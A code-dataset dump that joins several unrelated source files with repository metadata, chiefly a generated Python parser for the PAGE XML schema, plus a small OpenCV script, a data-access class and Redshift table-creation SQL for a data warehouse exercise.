large script', 'Kits - Khitan small script', 'Knda - Kannada', 'Kore - Korean (alias for Hangul + Han)', 'Kpel - Kpelle', 'Kthi - Kaithi', 'Lana - Tai Tham (Lanna)', 'Laoo - Lao', 'Latf - Latin (Fraktur variant)', 'Latg - Latin (Gaelic variant)', 'Latn - Latin', 'Leke - Leke', 'Lepc - Lepcha 
(Róng)', 'Limb - Limbu', 'Lina - Linear A', 'Linb - Linear B', 'Lisu - Lisu (Fraser)', 'Loma - Loma', 'Lyci - Lycian', 'Lydi - Lydian', 'Mahj - Mahajani', 'Mand - Mandaic, Mandaean', 'Mani - Manichaean', 'Marc - Marchen', 'Maya - Mayan hieroglyphs', 'Mend - Mende Kikakui', 'Merc - Meroitic Cursive', 'Mero - Meroitic Hieroglyphs', 'Mlym - Malayalam', 'Modi - Modi, Moḍī', 'Mong - Mongolian', 'Moon - Moon (Moon code, Moon script, Moon type)', 'Mroo - Mro, Mru', 'Mtei - Meitei Mayek (Meithei, Meetei)', 'Mult - Multani', 'Mymr - Myanmar (Burmese)', 'Narb - Old North Arabian (Ancient North Arabian)', 'Nbat - Nabataean', 'Newa - Newa, Newar, Newari', 'Nkgb - Nakhi Geba', 'Nkoo - N’Ko', 'Nshu - Nüshu', 'Ogam - Ogham', 'Olck - Ol Chiki (Ol Cemet’, Ol, Santali)', 'Orkh - Old Turkic, Orkhon Runic', 'Orya - Oriya', 'Osge - Osage', 'Osma - Osmanya', 'Palm - Palmyrene', 'Pauc - Pau Cin Hau', 'Perm - Old Permic', 'Phag - Phags-pa', 'Phli - Inscriptional Pahlavi', 'Phlp - Psalter Pahlavi', 'Phlv - Book Pahlavi', 'Phnx - Phoenician', 'Piqd - Klingon (KLI pIqaD)', 'Plrd - Miao (Pollard)', 'Prti - Inscriptional Parthian', 'Rjng - Rejang (Redjang, Kaganga)', 'Roro - Rongorongo', 'Runr - Runic', 'Samr - Samaritan', 'Sara - Sarati', 'Sarb - Old South Arabian', 'Saur - Saurashtra', 'Sgnw - SignWriting', 'Shaw - Shavian (Shaw)', 'Shrd - Sharada, Śāradā', 'Sidd - Siddham', 'Sind - Khudawadi, Sindhi', 'Sinh - Sinhala', 'Sora - Sora Sompeng', 'Sund - Sundanese', 'Sylo - Syloti Nagri', 'Syrc - Syriac', 'Syre - Syriac (Estrangelo variant)', 'Syrj - Syriac (Western variant)', 'Syrn - Syriac (Eastern variant)', 'Tagb - Tagbanwa', 'Takr - Takri', 'Tale - Tai Le', 'Talu - New Tai Lue', 'Taml - Tamil', 'Tang - Tangut', 'Tavt - Tai Viet', 'Telu - Telugu', 'Teng - Tengwar', 'Tfng - Tifinagh (Berber)', 'Tglg - Tagalog (Baybayin, Alibata)', 'Thaa - Thaana', 'Thai - Thai', 'Tibt - Tibetan', 'Tirh - Tirhuta', 'Ugar - Ugaritic', 'Vaii - Vai', 'Visp - Visible Speech', 'Wara - Warang Citi (Varang Kshiti)', 
'Wole - Woleai', 'Xpeo - Old Persian', 'Xsux - Cuneiform, Sumero-Akkadian', 'Yiii - Yi', 'Zinh - Code for inherited script', 'Zmth - Mathematical notation', 'Zsye - Symbols (Emoji variant)', 'Zsym - Symbols', 'Zxxx - Code for unwritten documents', 'Zyyy - Code for undetermined script', 'Zzzz - Code for uncoded script', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ScriptSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def validate_ProductionSimpleType(self, value):
# Validate type pc:ProductionSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['printed', 'typewritten', 'handwritten-cursive', 'handwritten-printscript', 'medieval-manuscript', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ProductionSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def hasContent_(self):
if (
self.TextLine or
self.TextEquiv or
self.TextStyle is not None or
super(TextRegionType, self).hasContent_()
):
return True
else:
return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='TextRegionType', pretty_print=True):
        """Write this region to *outfile* as an XML element indented at *level*."""
        # Allow an externally registered namespace definition to override the default.
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('TextRegionType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        # Prefer the tag name the element had in the originally parsed document.
        if self.original_tagname_ is not None and name_ == 'TextRegionType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='TextRegionType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='TextRegionType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            # No child content: emit a self-closing element.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='TextRegionType'):
        """Write this region's XML attributes to *outfile*.

        Each attribute is emitted only when it is set and not already handled
        (membership in *already_processed* guards against duplicates when
        subclasses cooperate with their base classes).
        """
        super(TextRegionType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='TextRegionType')
        if self.orientation is not None and 'orientation' not in already_processed:
            already_processed.add('orientation')
            outfile.write(' orientation="%s"' % self.gds_format_float(self.orientation, input_name='orientation'))
        if self.type_ is not None and 'type_' not in already_processed:
            already_processed.add('type_')
            outfile.write(' type=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.type_), input_name='type')), ))
        if self.leading is not None and 'leading' not in already_processed:
            already_processed.add('leading')
            outfile.write(' leading="%s"' % self.gds_format_integer(self.leading, input_name='leading'))
        if self.readingDirection is not None and 'readingDirection' not in already_processed:
            already_processed.add('readingDirection')
            outfile.write(' readingDirection=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.readingDirection), input_name='readingDirection')), ))
        if self.textLineOrder is not None and 'textLineOrder' not in already_processed:
            already_processed.add('textLineOrder')
            outfile.write(' textLineOrder=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.textLineOrder), input_name='textLineOrder')), ))
        if self.readingOrientation is not None and 'readingOrientation' not in already_processed:
            already_processed.add('readingOrientation')
            outfile.write(' readingOrientation="%s"' % self.gds_format_float(self.readingOrientation, input_name='readingOrientation'))
        if self.indented is not None and 'indented' not in already_processed:
            already_processed.add('indented')
            outfile.write(' indented="%s"' % self.gds_format_boolean(self.indented, input_name='indented'))
        if self.align is not None and 'align' not in already_processed:
            already_processed.add('align')
            outfile.write(' align=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.align), input_name='align')), ))
        if self.primaryLanguage is not None and 'primaryLanguage' not in already_processed:
            already_processed.add('primaryLanguage')
            outfile.write(' primaryLanguage=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.primaryLanguage), input_name='primaryLanguage')), ))
        if self.secondaryLanguage is not None and 'secondaryLanguage' not in already_processed:
            already_processed.add('secondaryLanguage')
            outfile.write(' secondaryLanguage=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.secondaryLanguage), input_name='secondaryLanguage')), ))
        if self.primaryScript is not None and 'primaryScript' not in already_processed:
            already_processed.add('primaryScript')
            outfile.write(' primaryScript=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.primaryScript), input_name='primaryScript')), ))
        if self.secondaryScript is not None and 'secondaryScript' not in already_processed:
            already_processed.add('secondaryScript')
            outfile.write(' secondaryScript=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.secondaryScript), input_name='secondaryScript')), ))
        if self.production is not None and 'production' not in already_processed:
            already_processed.add('production')
            outfile.write(' production=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.production), input_name='production')), ))
    def exportChildren(self, outfile, level, namespaceprefix_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', namespacedef_='', name_='TextRegionType', fromsubclass_=False, pretty_print=True):
        """Write child elements in schema order: inherited children first, then
        TextLine*, TextEquiv*, and the optional TextStyle."""
        super(TextRegionType, self).exportChildren(outfile, level, namespaceprefix_, namespacedef_, name_, True, pretty_print=pretty_print)
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        for TextLine_ in self.TextLine:
            namespaceprefix_ = self.TextLine_nsprefix_ + ':' if (UseCapturedNS_ and self.TextLine_nsprefix_) else ''
            TextLine_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='TextLine', pretty_print=pretty_print)
        for TextEquiv_ in self.TextEquiv:
            namespaceprefix_ = self.TextEquiv_nsprefix_ + ':' if (UseCapturedNS_ and self.TextEquiv_nsprefix_) else ''
            TextEquiv_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='TextEquiv', pretty_print=pretty_print)
        if self.TextStyle is not None:
            namespaceprefix_ = self.TextStyle_nsprefix_ + ':' if (UseCapturedNS_ and self.TextStyle_nsprefix_) else ''
            self.TextStyle.export(outfile, level, namespaceprefix_, namespacedef_='', name_='TextStyle', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
    def buildAttributes(self, node, attrs, already_processed):
        """Read this region's attributes from lxml element *node*.

        Enumerated attributes are validated as they are read; any problems are
        recorded on self.gds_collector_.  *already_processed* prevents the base
        class from re-reading attributes handled here.
        """
        value = find_attr_value_('orientation', node)
        if value is not None and 'orientation' not in already_processed:
            already_processed.add('orientation')
            value = self.gds_parse_float(value, node, 'orientation')
            self.orientation = value
        value = find_attr_value_('type', node)
        if value is not None and 'type' not in already_processed:
            already_processed.add('type')
            self.type_ = value
            self.validate_TextTypeSimpleType(self.type_) # validate type TextTypeSimpleType
        value = find_attr_value_('leading', node)
        if value is not None and 'leading' not in already_processed:
            already_processed.add('leading')
            self.leading = self.gds_parse_integer(value, node, 'leading')
        value = find_attr_value_('readingDirection', node)
        if value is not None and 'readingDirection' not in already_processed:
            already_processed.add('readingDirection')
            self.readingDirection = value
            self.validate_ReadingDirectionSimpleType(self.readingDirection) # validate type ReadingDirectionSimpleType
        value = find_attr_value_('textLineOrder', node)
        if value is not None and 'textLineOrder' not in already_processed:
            already_processed.add('textLineOrder')
            self.textLineOrder = value
            self.validate_TextLineOrderSimpleType(self.textLineOrder) # validate type TextLineOrderSimpleType
        value = find_attr_value_('readingOrientation', node)
        if value is not None and 'readingOrientation' not in already_processed:
            already_processed.add('readingOrientation')
            value = self.gds_parse_float(value, node, 'readingOrientation')
            self.readingOrientation = value
        value = find_attr_value_('indented', node)
        if value is not None and 'indented' not in already_processed:
            already_processed.add('indented')
            # xsd:boolean accepts the lexical forms true/false/1/0 only.
            if value in ('true', '1'):
                self.indented = True
            elif value in ('false', '0'):
                self.indented = False
            else:
                raise_parse_error(node, 'Bad boolean attribute')
        value = find_attr_value_('align', node)
        if value is not None and 'align' not in already_processed:
            already_processed.add('align')
            self.align = value
            self.validate_AlignSimpleType(self.align) # validate type AlignSimpleType
        value = find_attr_value_('primaryLanguage', node)
        if value is not None and 'primaryLanguage' not in already_processed:
            already_processed.add('primaryLanguage')
            self.primaryLanguage = value
            self.validate_LanguageSimpleType(self.primaryLanguage) # validate type LanguageSimpleType
        value = find_attr_value_('secondaryLanguage', node)
        if value is not None and 'secondaryLanguage' not in already_processed:
            already_processed.add('secondaryLanguage')
            self.secondaryLanguage = value
            self.validate_LanguageSimpleType(self.secondaryLanguage) # validate type LanguageSimpleType
        value = find_attr_value_('primaryScript', node)
        if value is not None and 'primaryScript' not in already_processed:
            already_processed.add('primaryScript')
            self.primaryScript = value
            self.validate_ScriptSimpleType(self.primaryScript) # validate type ScriptSimpleType
        value = find_attr_value_('secondaryScript', node)
        if value is not None and 'secondaryScript' not in already_processed:
            already_processed.add('secondaryScript')
            self.secondaryScript = value
            self.validate_ScriptSimpleType(self.secondaryScript) # validate type ScriptSimpleType
        value = find_attr_value_('production', node)
        if value is not None and 'production' not in already_processed:
            already_processed.add('production')
            self.production = value
            self.validate_ProductionSimpleType(self.production) # validate type ProductionSimpleType
        super(TextRegionType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'TextLine':
obj_ = TextLineType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.TextLine.append(obj_)
obj_.original_tagname_ = 'TextLine'
elif nodeName_ == 'TextEquiv':
obj_ = TextEquivType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.TextEquiv.append(obj_)
obj_.original_tagname_ = 'TextEquiv'
elif nodeName_ == 'TextStyle':
obj_ = TextStyleType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.TextStyle = obj_
obj_.original_tagname_ = 'TextStyle'
super(TextRegionType, self).buildChildren(child_, node, nodeName_, True)
# end class TextRegionType
# Maps XML root-element tag names to the generated classes that parse them.
GDSClassesMapping = {
    'PcGts': PcGtsType,
}
# Help text shown by usage() when the command line is malformed.
USAGE_TEXT = """
Usage: python <Parser>.py [ -s ] <in_xml_file>
"""
def usage():
    """Print the command-line usage text and exit with a failure status."""
    sys.stdout.write(USAGE_TEXT + '\n')
    sys.exit(1)
def get_root_tag(node):
    """Map the document root element to ``(tag name, parser class or None)``."""
    tag = Tag_pattern_.match(node.tag).groups()[-1]
    # Prefer the explicit mapping; fall back to a generated class of the same name.
    root_class = GDSClassesMapping.get(tag) or globals().get(tag)
    return tag, root_class
def get_required_ns_prefix_defs(rootNode):
    """Collect every namespace prefix definition used anywhere in the document.

    Returns a pair ``(nsmap, namespacedefs)``: a prefix->URI dict (the default,
    prefix-less namespace is skipped) and the matching space-separated
    ``xmlns:prefix="uri"`` attribute string.
    """
    nsmap = {}
    for element in rootNode.iter():
        for prefix, uri in element.nsmap.items():
            if prefix is not None:
                nsmap[prefix] = uri
    namespacedefs = ' '.join(
        'xmlns:{}="{}"'.format(prefix, uri)
        for prefix, uri in nsmap.items()
    )
    return nsmap, namespacedefs
def parse(inFileName, silence=False, print_warnings=True):
    """Parse XML file *inFileName* into an object tree and return the root object.

    Unless *silence* is true, the tree is re-exported to stdout as XML; unless
    *print_warnings* is false, any warnings collected while building are
    written to stderr.  Side effect: stores the document's namespace prefix
    map in the module global CapturedNsmap_.
    """
    global CapturedNsmap_
    gds_collector = GdsCollector_()
    parser = None
    doc = parsexml_(inFileName, parser)
    rootNode = doc.getroot()
    rootTag, rootClass = get_root_tag(rootNode)
    if rootClass is None:
        # Unknown root element: fall back to the document container type.
        rootTag = 'PcGtsType'
        rootClass = PcGtsType
    rootObj = rootClass.factory()
    rootObj.build(rootNode, gds_collector_=gds_collector)
    CapturedNsmap_, namespacedefs = get_required_ns_prefix_defs(rootNode)
    if not SaveElementTreeNode:
        # Drop the DOM references so Python can reclaim the memory.
        doc = None
        rootNode = None
    if not silence:
        sys.stdout.write('<?xml version="1.0" ?>\n')
        rootObj.export(
            sys.stdout, 0, name_=rootTag,
            namespacedef_=namespacedefs,
            pretty_print=True)
    if print_warnings and len(gds_collector.get_messages()) > 0:
        separator = ('-' * 50) + '\n'
        sys.stderr.write(separator)
        sys.stderr.write('----- Warnings -- count: {} -----\n'.format(
            len(gds_collector.get_messages()), ))
        gds_collector.write_messages(sys.stderr)
        sys.stderr.write(separator)
    return rootObj
def parseEtree(inFileName, silence=False, print_warnings=True,
               mapping=None, nsmap=None):
    """Parse XML file *inFileName* and also convert the result back to etree form.

    Returns ``(rootObj, rootElement, mapping, reverse_mapping)`` where
    *mapping* links generated objects to their etree elements and
    *reverse_mapping* is its inverse.  Unless *silence*, the re-serialized
    document is written to stdout; warnings go to stderr.
    """
    parser = None
    doc = parsexml_(inFileName, parser)
    gds_collector = GdsCollector_()
    rootNode = doc.getroot()
    rootTag, rootClass = get_root_tag(rootNode)
    if rootClass is None:
        # Unknown root element: fall back to the document container type.
        rootTag = 'PcGtsType'
        rootClass = PcGtsType
    rootObj = rootClass.factory()
    rootObj.build(rootNode, gds_collector_=gds_collector)
    # Enable Python to collect the space used by the DOM.
    if mapping is None:
        mapping = {}
    rootElement = rootObj.to_etree(
        None, name_=rootTag, mapping_=mapping, nsmap_=nsmap)
    reverse_mapping = rootObj.gds_reverse_node_mapping(mapping)
    if not SaveElementTreeNode:
        doc = None
        rootNode = None
    if not silence:
        content = etree_.tostring(
            rootElement, pretty_print=True,
            xml_declaration=True, encoding="utf-8")
        sys.stdout.write(str(content))
        sys.stdout.write('\n')
    if print_warnings and len(gds_collector.get_messages()) > 0:
        separator = ('-' * 50) + '\n'
        sys.stderr.write(separator)
        sys.stderr.write('----- Warnings -- count: {} -----\n'.format(
            len(gds_collector.get_messages()), ))
        gds_collector.write_messages(sys.stderr)
        sys.stderr.write(separator)
    return rootObj, rootElement, mapping, reverse_mapping
def parseString(inString, silence=False, print_warnings=True):
    '''Parse a string, create the object tree, and export it.

    Arguments:
    - inString -- A string.  This XML fragment should not start
      with an XML declaration containing an encoding.
    - silence -- A boolean.  If False, export the object.
    - print_warnings -- If True, write collected build warnings to stderr.

    Returns -- The root object in the tree.
    '''
    parser = None
    rootNode= parsexmlstring_(inString, parser)
    gds_collector = GdsCollector_()
    rootTag, rootClass = get_root_tag(rootNode)
    if rootClass is None:
        # Unknown root element: fall back to the document container type.
        rootTag = 'PcGtsType'
        rootClass = PcGtsType
    rootObj = rootClass.factory()
    rootObj.build(rootNode, gds_collector_=gds_collector)
    if not SaveElementTreeNode:
        # Drop the DOM reference so Python can reclaim the memory.
        rootNode = None
    if not silence:
        sys.stdout.write('<?xml version="1.0" ?>\n')
        rootObj.export(
            sys.stdout, 0, name_=rootTag,
            namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"')
    if print_warnings and len(gds_collector.get_messages()) > 0:
        separator = ('-' * 50) + '\n'
        sys.stderr.write(separator)
        sys.stderr.write('----- Warnings -- count: {} -----\n'.format(
            len(gds_collector.get_messages()), ))
        gds_collector.write_messages(sys.stderr)
        sys.stderr.write(separator)
    return rootObj
def parseLiteral(inFileName, silence=False, print_warnings=True):
    """Parse XML file *inFileName*; unless *silence*, write Python literal code
    that reconstructs the tree to stdout.  Returns the root object."""
    parser = None
    doc = parsexml_(inFileName, parser)
    gds_collector = GdsCollector_()
    rootNode = doc.getroot()
    rootTag, rootClass = get_root_tag(rootNode)
    if rootClass is None:
        # Unknown root element: fall back to the document container type.
        rootTag = 'PcGtsType'
        rootClass = PcGtsType
    rootObj = rootClass.factory()
    rootObj.build(rootNode, gds_collector_=gds_collector)
    # Enable Python to collect the space used by the DOM.
    if not SaveElementTreeNode:
        doc = None
        rootNode = None
    if not silence:
        sys.stdout.write('#from page import *\n\n')
        sys.stdout.write('import page as model_\n\n')
        sys.stdout.write('rootObj = model_.rootClass(\n')
        rootObj.exportLiteral(sys.stdout, 0, name_=rootTag)
        sys.stdout.write(')\n')
    if print_warnings and len(gds_collector.get_messages()) > 0:
        separator = ('-' * 50) + '\n'
        sys.stderr.write(separator)
        sys.stderr.write('----- Warnings -- count: {} -----\n'.format(
            len(gds_collector.get_messages()), ))
        gds_collector.write_messages(sys.stderr)
        sys.stderr.write(separator)
    return rootObj
def main():
    """CLI entry point: expects exactly one argument, the XML file to parse."""
    cli_args = sys.argv[1:]
    if len(cli_args) != 1:
        usage()
    else:
        parse(cli_args[0])
if __name__ == '__main__':
    main()
# Export-time element renames keyed by original tag name (none for this schema).
RenameMappings_ = {
}
#
# Mapping of namespaces to types defined in them
# and the file in which each is defined.
# simpleTypes are marked "ST" and complexTypes "CT".
# Every PAGE type comes from the single schema file below, so the mapping is
# built programmatically rather than spelling out one tuple per type.
NamespaceToDefMappings_ = {
    'http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15': [
        (type_name, 'assets/schema/pagecontent.xsd', type_kind)
        for type_kind, type_names in (
            ('ST', (
                'ColourSimpleType', 'ReadingDirectionSimpleType',
                'TextLineOrderSimpleType', 'TextTypeSimpleType',
                'PageTypeSimpleType', 'ConfSimpleType', 'LanguageSimpleType',
                'ScriptSimpleType', 'ColourDepthSimpleType',
                'GraphicsTypeSimpleType', 'ChartTypeSimpleType', 'PointsType',
                'ProductionSimpleType', 'AlignSimpleType',
                'GroupTypeSimpleType', 'TextDataTypeSimpleType',
                'UnderlineStyleSimpleType',
            )),
            ('CT', (
                'PcGtsType', 'MetadataType', 'MetadataItemType', 'LabelsType',
                'LabelType', 'PageType', 'TextRegionType', 'CoordsType',
                'TextLineType', 'WordType', 'GlyphType', 'TextEquivType',
                'ImageRegionType', 'LineDrawingRegionType',
                'GraphicRegionType', 'TableRegionType', 'GridType',
                'GridPointsType', 'ChartRegionType', 'SeparatorRegionType',
                'MathsRegionType', 'ChemRegionType', 'MapRegionType',
                'MusicRegionType', 'AdvertRegionType', 'NoiseRegionType',
                'UnknownRegionType', 'CustomRegionType', 'PrintSpaceType',
                'ReadingOrderType', 'RegionRefIndexedType',
                'OrderedGroupIndexedType', 'UnorderedGroupIndexedType',
                'RegionRefType', 'OrderedGroupType', 'UnorderedGroupType',
                'BorderType', 'LayersType', 'LayerType', 'BaselineType',
                'RelationsType', 'RelationType', 'TextStyleType', 'RegionType',
                'AlternativeImageType', 'GraphemesType', 'GraphemeBaseType',
                'GraphemeType', 'NonPrintingCharType', 'GraphemeGroupType',
                'UserDefinedType', 'UserAttributeType', 'TableCellRoleType',
                'RolesType',
            )),
        )
        for type_name in type_names
    ],
}
__all__ = [
"AdvertRegionType",
"AlternativeImageType",
"BaselineType",
"BorderType",
"ChartRegionType",
"ChemRegionType",
"CoordsType",
"CustomRegionType",
"GlyphType",
"GraphemeBaseType",
"GraphemeGroupType",
"GraphemeType",
"GraphemesType",
"GraphicRegionType",
"GridPointsType",
"GridType",
"ImageRegionType",
"LabelType",
"LabelsType",
"LayerType",
"LayersType",
"LineDrawingRegionType",
"MapRegionType",
"MathsRegionType",
"MetadataItemType",
"MetadataType",
"MusicRegionType",
"NoiseRegionType",
"NonPrintingCharType",
"OrderedGroupIndexedType",
"OrderedGroupType",
"PageType",
"PcGtsType",
"PrintSpaceType",
"ReadingOrderType",
"RegionRefIndexedType",
"RegionRefType",
"RegionType",
"RelationType",
"RelationsType",
"RolesType",
"SeparatorRegionType",
"TableCellRoleType",
"TableRegionType",
"TextEquivType",
"TextLineType",
"TextRegionType",
"TextStyleType",
"UnknownRegionType",
"UnorderedGroupIndexedType",
"UnorderedGroupType",
"UserAttributeType",
"UserDefinedType",
"WordType"
]
|
[
"lucas@sulzbach.org"
] |
lucas@sulzbach.org
|
9e5d44f522f009d23699c1591c4e0874b753a458
|
74b978b712a5fa1645e7b7dcc9488a9a47a7a1b5
|
/blueprint/models.py
|
d4fb16656bfd02c446dbc1c4704c4fcfc26c8fbc
|
[] |
no_license
|
ikalchenko/blueprint
|
6a9653365c08651e997e0ee230e945d405746cb7
|
ab5c039fe2a1fce75266f17e00c867e2abd05e78
|
refs/heads/master
| 2020-05-21T18:55:43.272085
| 2019-05-20T19:21:32
| 2019-05-20T19:21:32
| 186,143,153
| 0
| 0
| null | 2019-05-20T19:21:34
| 2019-05-11T14:30:33
|
Python
|
UTF-8
|
Python
| false
| false
| 299
|
py
|
from .extensions import db
class BaseModel(db.Model):
id = db.Column(db.Integer, primary_key=True)
# date_created = db.Column(db.DateTime, server_default=db.func.now())
# date_modified = db.Column(db.DateTime, server_default=db.func.now())
async def serialize(self):
pass
|
[
"ikalchenko99@gmail.com"
] |
ikalchenko99@gmail.com
|
575f16350068085904d3e88d041788aa5d2ad0bc
|
c6b46e402eea7769dd5c7e5232e677976ddd7482
|
/main.py
|
9b7acb37f2a0ee60bbe8a8e955537c68e2642ddb
|
[
"MIT"
] |
permissive
|
alhazmy13/ResistorsOpenCV
|
cbdab3b2c3c9736452e7a97f0f2c16e3b630a39d
|
95237e6014ef51a4a2eb3f049f9844f535090ecf
|
refs/heads/master
| 2023-02-14T02:24:55.266688
| 2020-10-25T12:16:52
| 2020-10-25T12:16:52
| 307,081,563
| 3
| 0
| null | 2020-10-25T12:04:24
| 2020-10-25T11:14:44
|
Python
|
UTF-8
|
Python
| false
| false
| 305
|
py
|
import cv2
from vision import Vision
vision = Vision()
if __name__ == "__main__":
while not (cv2.waitKey(1) == ord('q')):
_, live_img = vision.get_camera()
vision.print_result(live_img=live_img)
cv2.imshow("Frame", live_img)
vision.release()
cv2.destroyAllWindows()
|
[
"me@alhazmy13.net"
] |
me@alhazmy13.net
|
e770a09f01a41928a6a78f803955c09a6b3e83a7
|
33638679295dbe6bf1c9708fba570708afdc081b
|
/api/stablemanager/datalayer.py
|
5229c165c0ee079a4229b0c9b6270f1044727fe5
|
[
"Apache-2.0"
] |
permissive
|
toddg3s/wtfmanager
|
3317c252138d390766d3214ae6ccc472f0413d87
|
04fb30fb7de1a60a74e17b1254b5c2d3a7450b73
|
refs/heads/master
| 2021-08-31T22:45:12.444566
| 2017-12-23T06:55:33
| 2017-12-23T06:55:33
| 115,176,380
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,260
|
py
|
class DataProvider:
def get(self, datatype, dataid):
pass
def put(self, dataobject):
pass
def delete(self, dataobject):
pass
def query(self, datatype):
pass
def get_actions(self, from_date, to_date):
pass
def get_horse_schedules(self, horse_id):
pass
def get_horse_people(self, horse_id, person_type=None):
pass
class QuerySpec:
DataType = ''
Filters = {}
Sorts = {}
_doquery = None
def __init__(self, datatype, doquery):
self.DataType = datatype
self._doquery = doquery
def filter(self, prop, operator, value):
queryable = False
if prop == 'id':
queryable = True
elif self.DataType == 'schedule' and prop == 'horse_id':
queryable = True
elif self.DataType == 'association' and (prop == 'horse_id' or prop == 'person_id'):
queryable = True
elif self.DataType == 'action' and prop == 'horse_id':
queryable = True
self.Filters[prop] = (operator, value, queryable)
return self
def sort(self, prop, order='asc'):
self.Sorts[prop] = order
return self
def go(self):
return self._doquery(self)
|
[
"todd@g3s.net"
] |
todd@g3s.net
|
ab1ae3d0b32da3e9f20bd3fb9d1b81d217bd46eb
|
02d0b4180184eb5598b3f9c7d2c34540562e74ea
|
/ND03 - Data Warehouse/sql_queries.py
|
07cf68f9a46e83fc8bf42ff754f8ffebd3afe15c
|
[] |
no_license
|
sketha33/Udacity_DE_NanoDegree
|
8d6e0438686cd61c925c39f13c74257ea6bd9edc
|
b0d310821a4ea98afd1c7b5ca9f06b0cc1ca2c5f
|
refs/heads/main
| 2022-12-29T19:42:33.974834
| 2020-10-18T20:22:23
| 2020-10-18T20:22:23
| 303,818,151
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,499
|
py
|
import configparser
# CONFIG
config = configparser.ConfigParser()
config.read('dwh.cfg')
# Truncate TABLES
staging_events_table_trun = "TRUNCATE TABLE staging_events"
staging_songs_table_trun = "TRUNCATE TABLE staging_songs"
songplay_table_trun = "TRUNCATE TABLE songplay"
user_table_trun = "TRUNCATE TABLE users"
song_table_trun = "TRUNCATE TABLE songs"
artist_table_trun = "TRUNCATE TABLE artists"
time_table_trun = "TRUNCATE TABLE time"
# DROP TABLES
staging_events_table_drop = "DROP TABLE staging_events"
staging_songs_table_drop = "DROP TABLE staging_songs"
songplay_table_drop = "DROP TABLE songplay"
user_table_drop = "DROP TABLE users"
song_table_drop = "DROP TABLE songs"
artist_table_drop = "DROP TABLE artists"
time_table_drop = "DROP TABLE time"
# CREATE TABLES
staging_events_table_create = (""" CREATE TABLE IF NOT EXISTS staging_events ( artist VARCHAR, \
auth VARCHAR, \
firstName VARCHAR, \
gender VARCHAR, \
itemInSession VARCHAR, \
lastName VARCHAR, \
length FLOAT, \
level VARCHAR, \
location VARCHAR, \
method VARCHAR, \
page VARCHAR, \
registration VARCHAR, \
sessionId VARCHAR, \
song VARCHAR, \
status VARCHAR, \
ts VARCHAR, \
userAgent VARCHAR, \
userId VARCHAR ); """)
staging_songs_table_create = (""" CREATE TABLE IF NOT EXISTS staging_songs (num_songs INTEGER, \
artist_id VARCHAR, \
artist_latitude VARCHAR, \
artist_longitude VARCHAR, \
artist_location VARCHAR, \
artist_name VARCHAR, \
song_id VARCHAR, \
title VARCHAR, \
duration FLOAT, \
year INTEGER); """)
songplay_table_create = (""" CREATE TABLE IF NOT EXISTS songplay (songplay_id INTEGER IDENTITY(0,1) NOT NULL PRIMARY KEY, \
start_time DATE, \
user_id VARCHAR NOT NULL, \
level VARCHAR, \
song_id VARCHAR NOT NULL, \
artist_id VARCHAR NOT NULL, \
session_id VARCHAR, \
location VARCHAR, \
user_agent VARCHAR); """)
